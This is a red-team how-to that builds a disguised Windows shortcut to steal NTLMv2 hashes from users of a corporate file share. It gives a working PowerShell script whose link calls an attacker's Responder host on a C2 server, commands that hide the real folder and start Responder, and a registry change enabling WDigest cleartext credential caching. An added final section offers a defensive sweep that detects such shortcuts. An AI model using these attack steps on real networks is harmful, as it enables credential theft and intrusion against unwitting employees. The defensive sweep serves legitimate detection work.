A neat little trick to gather NTLMv2 hashes every time a corporate file share is accessed is to plant a malicious shortcut file in the same directory on the file share as the folder it impersonates.
First, create the malicious file with the following script from v3ded's blog, which I modified slightly to weaponize it for use with Responder.
$path = "$([Environment]::GetFolderPath('Desktop'))\<FILE>.lnk"
$wshell = New-Object -ComObject Wscript.Shell
$shortcut = $wshell.CreateShortcut($path)
$shortcut.IconLocation = "C:\Windows\System32\shell32.dll,70"
$shortcut.TargetPath = "cmd.exe"
$shortcut.Arguments = "/c explorer.exe Z:\PATH\TO\SHARE & \\<LHOST>\foobar" # Calls the SMB share of the responder instance on the C2 server
$shortcut.WorkingDirectory = "C:"
$shortcut.HotKey = "CTRL+C"
$shortcut.Description = ""
$shortcut.WindowStyle = 7
# 7 = Minimized window
# 3 = Maximized window
# 1 = Normal window
$shortcut.Save()
(Get-Item $path).Attributes += 'Hidden' # Optional if we want to make the link invisible (prevent user clicks)
Next, set the shortcut's icon to the same folder icon used on the file share. All that is left is to hide the target folder with the following command (attrib +h sets the hidden attribute; -h would clear it).
C:\> attrib +h Z:\PATH\TO\FOLDER\<FOLDER>
After this, the malicious shortcut sits in the same directory as the now-hidden, non-malicious folder. Every time a user opens what looks like the folder, their NTLMv2 hash is sent to the C2 server, which is running Responder.
$ sudo responder -I <INTERFACE>
PS C:\> Set-ItemProperty -Force -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name "UseLogonCredential" -Value '1'
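As an added example that is not part of the original post, here is a defender-side sweep of a file share for shortcuts built the way described above: it uses the same WScript.Shell COM object read-only to inspect each .lnk and flags UNC paths in the target or arguments, an interpreter as the target, the hidden attribute, and a hidden sibling folder with the same name (the decoy pattern). $SharePath is an assumed parameter; adjust it to the share under review.

```powershell
# Added example (not from the original post): find .lnk files on a share that
# match the decoy-shortcut pattern. $SharePath is an assumed parameter.
param([string]$SharePath = 'Z:\PATH\TO\SHARE')

$wshell = New-Object -ComObject WScript.Shell

Get-ChildItem -Path $SharePath -Recurse -Force -File -Filter '*.lnk' | ForEach-Object {
    $lnk = $_
    $sc  = $wshell.CreateShortcut($lnk.FullName)   # read-only inspection of the shortcut
    $cmd = "$($sc.TargetPath) $($sc.Arguments)"
    $findings = [System.Collections.Generic.List[string]]::new()

    # A UNC path (\\host\share) in the target or arguments forces an SMB
    # connection, and therefore an NTLM exchange, as soon as the link is opened.
    if ($cmd -match '\\\\[^\\\s]+\\') { $findings.Add('UNC path in target/arguments') }

    # A shortcut that launches a shell or script host instead of a document.
    if ($sc.TargetPath -match '(?i)\\(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32)\.exe$') {
        $findings.Add('shell or script host as target')
    }

    # Hidden attribute on the .lnk itself (the optional step in the post).
    if ($lnk.Attributes -band [IO.FileAttributes]::Hidden) { $findings.Add('hidden attribute on .lnk') }

    # A hidden folder next to the shortcut with the same base name: the real
    # folder the shortcut impersonates.
    $siblingPath = Join-Path $lnk.DirectoryName $lnk.BaseName
    $sibling = Get-Item -LiteralPath $siblingPath -Force -ErrorAction SilentlyContinue
    if ($sibling -and $sibling.PSIsContainer -and ($sibling.Attributes -band [IO.FileAttributes]::Hidden)) {
        $findings.Add('hidden folder with the same name alongside')
    }

    if ($findings.Count -gt 0) {
        [PSCustomObject]@{
            Path     = $lnk.FullName
            Target   = $sc.TargetPath
            Args     = $sc.Arguments
            Findings = $findings -join '; '
        }
    }
}
```

Run it from a host with the share mapped; pairing the sweep with a block on outbound SMB (TCP 445) at the network edge keeps the hash from reaching an external listener even when a user does click.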